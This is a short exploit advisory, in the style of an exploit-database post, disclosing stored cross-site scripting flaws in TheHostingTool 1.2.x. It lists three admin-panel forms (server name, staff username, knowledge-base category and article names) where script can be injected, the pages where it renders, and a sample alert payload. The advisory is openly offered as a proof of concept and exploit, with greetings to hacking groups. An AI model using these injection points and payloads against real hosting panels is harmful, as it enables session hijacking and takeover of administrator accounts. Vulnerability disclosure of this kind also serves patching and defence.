#Title : TheHostingTool 1.2.x Multiple Cross Site Scripting

#Author : DevilScreaM

#Date : 7 Desember 2013

#Category : Web Applications

#Vendor : http://thehostingtool.com/

#Version : 1.2.x

#Type : PHP

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
 	  Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : Cross Site Scripting


POC & Exploit

XSS 1

http://127.0.0.1/admin/?page=servers&sub=add

At Column "Name" input your XSS

View Your XSS at 

http://127.0.0.1/admin/?page=servers&sub=view
http://127.0.0.1/admin/?page=servers&sub=test


XSS 2

http://127.0.0.1/admin/?page=staff&sub=add

At Column "Username" input your XSS

View Your XSS At

http://127.0.0.1/admin/?page=staff&sub=edit


XSS 3

1. Create Category at http://127.0.0.1/admin/?page=kb&sub=cat

2. After Create Category, Create Article At http://127.0.0.1/admin/?page=kb&sub=art

3. At Column "Name" or "Article Name" input your XSS

Example <script>alert('DevilScreaM')</script>

4. View Your XSS at

http://127.0.0.1/support/